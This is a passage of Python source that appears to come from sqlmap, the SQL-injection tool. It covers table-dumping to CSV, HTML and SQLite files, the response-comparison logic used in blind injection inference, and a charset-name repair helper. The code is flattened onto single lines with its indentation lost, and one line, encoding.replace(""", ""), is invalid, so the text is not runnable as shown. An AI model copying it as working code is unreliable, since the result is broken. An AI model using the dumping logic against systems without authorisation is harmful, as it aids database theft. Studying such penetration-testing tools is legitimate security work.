tempfile.mkdtemp(prefix="sqlmapdb") except IOError as _: errMsg = "unable to write to the temporary directory ('%s'). " % _ errMsg += "Please make sure that your disk is not full and " errMsg += "that you have sufficient write permissions to " errMsg += "create temporary files and/or directories" raise SqlmapSystemException(errMsg) warnMsg = "unable to create dump directory " warnMsg += "'%s' (%s). " % (dumpDbPath, getSafeExString(ex)) warnMsg += "Using temporary directory '%s' instead" % tempDir logger.warn(warnMsg) dumpDbPath = tempDir dumpFileName = os.path.join( dumpDbPath, re.sub( r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))) if not checkFile(dumpFileName, False): try: openFile(dumpFileName, "w+b").close() except SqlmapSystemException: raise except: warnFile = True _ = re.sub( r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(table))) if len(_) < len(table) or IS_WIN and table.upper( ) in WINDOWS_RESERVED_NAMES: _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(table)) dumpFileName = os.path.join( dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(getBytes(table)).hexdigest()[:8], conf.dumpFormat.lower())) else: dumpFileName = os.path.join( dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower())) else: appendToFile = any((conf.limitStart, conf.limitStop)) if not appendToFile: count = 1 while True: candidate = "%s.%d" % (dumpFileName, count) if not checkFile(candidate, False): try: shutil.copyfile(dumpFileName, candidate) except IOError: pass finally: break else: count += 1 dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab", buffering=DUMP_FILE_BUFFER_SIZE) count = int(tableValues["__infos__"]["count"]) separator = str() field = 1 fields = len(tableValues) - 1 columns = prioritySortColumns(tableValues.keys()) if conf.col: cols = conf.col.split(',') columns = sorted(columns, key=lambda _: cols.index(_) if _ in cols else 0) for column in columns: if column != "__infos__": info = tableValues[column] lines = "-" * (int(info["length"]) + 2) separator += "+%s" % lines separator += "+" self._write( "Database: %s\nTable: %s" % (unsafeSQLIdentificatorNaming(db) if db else "Current database", unsafeSQLIdentificatorNaming(table))) if conf.dumpFormat == DUMP_FORMAT.SQLITE: cols = [] for column in columns: if column != "__infos__": colType = Replication.INTEGER for value in tableValues[column]['values']: try: if not value or value == " ": # NULL continue int(value) except ValueError: colType = None break if colType is None: colType = Replication.REAL for value in tableValues[column]['values']: try: if not value or value == " ": # NULL continue float(value) except ValueError: colType = None break cols.append((unsafeSQLIdentificatorNaming(column), colType if colType else Replication.TEXT)) rtable = replication.createTable(table, cols) elif conf.dumpFormat == DUMP_FORMAT.HTML: dataToDumpFile(dumpFP, "<!DOCTYPE html>\n<html>\n<head>\n") dataToDumpFile( dumpFP, "<meta http-equiv=\"Content-type\" content=\"text/html;charset=%s\">\n" % UNICODE_ENCODING) dataToDumpFile( dumpFP, "<meta name=\"generator\" content=\"%s\" />\n" % VERSION_STRING) dataToDumpFile( dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table))) dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE) dataToDumpFile(dumpFP, "\n</head>\n<body>\n<table>\n<thead>\n<tr>\n") if count == 1: self._write("[1 entry]") else: self._write("[%d entries]" % count) self._write(separator) for column in columns: if column != "__infos__": info = tableValues[column] column = unsafeSQLIdentificatorNaming(column) maxlength = int(info["length"]) blank = " " * (maxlength - len(column)) self._write("| %s%s" % (column, blank), newline=False) if not appendToFile: if conf.dumpFormat == DUMP_FORMAT.CSV: if field == fields: dataToDumpFile(dumpFP, "%s" % safeCSValue(column)) else: dataToDumpFile( dumpFP, "%s%s" % (safeCSValue(column), conf.csvDel)) elif conf.dumpFormat == DUMP_FORMAT.HTML: dataToDumpFile( dumpFP, "<th>%s</th>" % cgi.escape(column).encode( "ascii", "xmlcharrefreplace")) field += 1 if conf.dumpFormat == DUMP_FORMAT.HTML: dataToDumpFile(dumpFP, "\n</tr>\n</thead>\n<tbody>\n") self._write("|\n%s" % separator) if conf.dumpFormat == DUMP_FORMAT.CSV: dataToDumpFile(dumpFP, "\n" if not appendToFile else "") elif conf.dumpFormat == DUMP_FORMAT.SQLITE: rtable.beginTransaction() if count > TRIM_STDOUT_DUMP_SIZE: warnMsg = "console output will be trimmed to " warnMsg += "last %d rows due to " % TRIM_STDOUT_DUMP_SIZE warnMsg += "large table size" logger.warning(warnMsg) for i in xrange(count): console = (i >= count - TRIM_STDOUT_DUMP_SIZE) field = 1 values = [] if conf.dumpFormat == DUMP_FORMAT.HTML: dataToDumpFile(dumpFP, "<tr>") for column in columns: if column != "__infos__": info = tableValues[column] if len(info["values"]) <= i: continue if info["values"][i] is None: value = u'' else: value = getUnicode(info["values"][i]) value = DUMP_REPLACEMENTS.get(value, value) values.append(value) maxlength = int(info["length"]) blank = " " * (maxlength - len(value)) self._write("| %s%s" % (value, blank), newline=False, console=console) if len(value ) > MIN_BINARY_DISK_DUMP_SIZE and r'\x' in value: try: mimetype = magic.from_buffer(value, mime=True) if any( mimetype.startswith(_) for _ in ("application", "image")): if not os.path.isdir(dumpDbPath): os.makedirs(dumpDbPath) _ = re.sub( r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode( unsafeSQLIdentificatorNaming(column))) filepath = os.path.join( dumpDbPath, "%s-%d.bin" % (_, randomInt(8))) warnMsg = "writing binary ('%s') content to file '%s' " % ( mimetype, filepath) logger.warn(warnMsg) with open(filepath, "wb") as f: _ = safechardecode(value, True) f.write(_) except magic.MagicException as ex: logger.debug(getSafeExString(ex)) if conf.dumpFormat == DUMP_FORMAT.CSV: if field == fields: dataToDumpFile(dumpFP, "%s" % safeCSValue(value)) else: dataToDumpFile( dumpFP, "%s%s" % (safeCSValue(value), conf.csvDel)) elif conf.dumpFormat == DUMP_FORMAT.HTML: dataToDumpFile( dumpFP, "<td>%s</td>" % cgi.escape(value).encode( "ascii", "xmlcharrefreplace")) field += 1 if conf.dumpFormat == DUMP_FORMAT.SQLITE: try: rtable.insert(values) except SqlmapValueException: pass elif conf.dumpFormat == DUMP_FORMAT.CSV: dataToDumpFile(dumpFP, "\n") elif conf.dumpFormat == DUMP_FORMAT.HTML: dataToDumpFile(dumpFP, "</tr>\n") self._write("|", console=console) self._write("%s\n" % separator) if conf.dumpFormat == DUMP_FORMAT.SQLITE: rtable.endTransaction() logger.info("table '%s.%s' dumped to sqlite3 database '%s'" % (db, table, replication.dbpath)) elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML): if conf.dumpFormat == DUMP_FORMAT.HTML: dataToDumpFile(dumpFP, "</tbody>\n</table>\n</body>\n</html>") else: dataToDumpFile(dumpFP, "\n") dumpFP.close() msg = "table '%s.%s' dumped to %s file '%s'" % ( db, table, conf.dumpFormat, dumpFileName) if not warnFile: logger.info(msg) else: logger.warn(msg)
def _comparison(page, headers, code, getRatioValue, pageLength): threadData = getCurrentThreadData() if kb.testMode: threadData.lastComparisonHeaders = listToStrValue( _ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else "" threadData.lastComparisonPage = page threadData.lastComparisonCode = code if page is None and pageLength is None: return None if any((conf.string, conf.notString, conf.regexp)): rawResponse = "%s%s" % (listToStrValue( _ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else "", page) # String to match in page when the query is True and/or valid if conf.string: return conf.string in rawResponse # String to match in page when the query is False and/or invalid if conf.notString: return conf.notString not in rawResponse # Regular expression to match in page when the query is True and/or valid if conf.regexp: return re.search(conf.regexp, rawResponse, re.I | re.M) is not None # HTTP code to match when the query is valid if conf.code: return conf.code == code seqMatcher = threadData.seqMatcher seqMatcher.set_seq1(kb.pageTemplate) if page: # In case of an DBMS error page return None if kb.errorIsNone and ( wasLastResponseDBMSError() or wasLastResponseHTTPError()) and not kb.negativeLogic: return None # Dynamic content lines to be excluded before comparison if not kb.nullConnection: page = removeDynamicContent(page) seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate)) if not pageLength: pageLength = len(page) if kb.nullConnection and pageLength: if not seqMatcher.a: errMsg = "problem occurred while retrieving original page content " errMsg += "which prevents sqlmap from continuation. Please rerun, " errMsg += "and if the problem persists turn off any optimization switches" raise SqlmapNoneDataException(errMsg) ratio = 1. * pageLength / len(seqMatcher.a) if ratio > 1.: ratio = 1. / ratio else: # Preventing "Unicode equal comparison failed to convert both arguments to Unicode" # (e.g. if one page is PDF and the other is HTML) if isinstance(seqMatcher.a, six.binary_type) and isinstance( page, six.text_type): page = getBytes(page, kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore") elif isinstance(seqMatcher.a, six.text_type) and isinstance( page, six.binary_type): seqMatcher.a = getBytes(seqMatcher.a, kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore") if any(_ is None for _ in (page, seqMatcher.a)): return None elif seqMatcher.a and page and seqMatcher.a == page: ratio = 1. elif kb.skipSeqMatcher or seqMatcher.a and page and any( len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)): if not page or not seqMatcher.a: return float(seqMatcher.a == page) else: ratio = 1. * len(seqMatcher.a) / len(page) if ratio > 1: ratio = 1. / ratio else: seq1, seq2 = None, None if conf.titles: seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a) seq2 = extractRegexResult(HTML_TITLE_REGEX, page) else: seq1 = getFilteredPageContent( seqMatcher.a, True) if conf.textOnly else seqMatcher.a seq2 = getFilteredPageContent(page, True) if conf.textOnly else page if seq1 is None or seq2 is None: return None seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") if kb.heavilyDynamic: seq1 = seq1.split("\n") seq2 = seq2.split("\n") seqMatcher.set_seq1(seq1) seqMatcher.set_seq2(seq2) ratio = round( seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio(), 3) # If the url is stable and we did not set yet the match ratio and the # current injected value changes the url page content if kb.matchRatio is None: if ratio >= LOWER_RATIO_BOUND and ratio <= UPPER_RATIO_BOUND: kb.matchRatio = ratio logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio) if kb.testMode: threadData.lastComparisonRatio = ratio # If it has been requested to return the ratio and not a comparison # response if getRatioValue: return ratio elif ratio > UPPER_RATIO_BOUND: return True elif ratio < LOWER_RATIO_BOUND: return False elif kb.matchRatio is None: return None else: return (ratio - kb.matchRatio) > DIFF_TOLERANCE
def checkCharEncoding(encoding, warn=True): """ Checks encoding name, repairs common misspellings and adjusts to proper namings used in codecs module >>> checkCharEncoding('iso-8858', False) 'iso8859-1' >>> checkCharEncoding('en_us', False) 'utf8' """ if isinstance(encoding, six.binary_type): encoding = getUnicode(encoding) if isListLike(encoding): encoding = unArrayizeValue(encoding) if encoding: encoding = encoding.lower() else: return encoding # Reference: http://www.destructor.de/charsets/index.htm translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"} for delimiter in (';', ',', '('): if delimiter in encoding: encoding = encoding[:encoding.find(delimiter)].strip() encoding = encoding.replace(""", "") # popular typos/errors if "8858" in encoding: encoding = encoding.replace("8858", "8859") # iso-8858 -> iso-8859 elif "8559" in encoding: encoding = encoding.replace("8559", "8859") # iso-8559 -> iso-8859 elif "8895" in encoding: encoding = encoding.replace("8895", "8859") # iso-8895 -> iso-8859 elif "5889" in encoding: encoding = encoding.replace("5889", "8859") # iso-5889 -> iso-8859 elif "5589" in encoding: encoding = encoding.replace("5589", "8859") # iso-5589 -> iso-8859 elif "2313" in encoding: encoding = encoding.replace("2313", "2312") # gb2313 -> gb2312 elif encoding.startswith("x-"): encoding = encoding[len("x-"):] # x-euc-kr -> euc-kr / x-mac-turkish -> mac-turkish elif "windows-cp" in encoding: encoding = encoding.replace("windows-cp", "windows") # windows-cp-1254 -> windows-1254 # name adjustment for compatibility if encoding.startswith("8859"): encoding = "iso-%s" % encoding elif encoding.startswith("cp-"): encoding = "cp%s" % encoding[3:] elif encoding.startswith("euc-"): encoding = "euc_%s" % encoding[4:] elif encoding.startswith("windows") and not encoding.startswith("windows-"): encoding = "windows-%s" % encoding[7:] elif encoding.find("iso-88") > 0: encoding = encoding[encoding.find("iso-88"):] elif encoding.startswith("is0-"): encoding = "iso%s" % encoding[4:] elif encoding.find("ascii") > 0: encoding = "ascii" elif encoding.find("utf8") > 0: encoding = "utf8" elif encoding.find("utf-8") > 0: encoding = "utf-8" # Reference: http://philip.html5.org/data/charsets-2.html if encoding in translate: encoding = translate[encoding] elif encoding in ("null", "{charset}", "charset", "*") or not re.search(r"\w", encoding): return None # Reference: http://www.iana.org/assignments/character-sets # Reference: http://docs.python.org/library/codecs.html try: codecs.lookup(encoding) except: encoding = None if encoding: try: six.text_type(getBytes(randomStr()), encoding) except: if warn: warnMsg = "invalid web page charset '%s'" % encoding singleTimeLogMessage(warnMsg, logging.WARN, encoding) encoding = None return encoding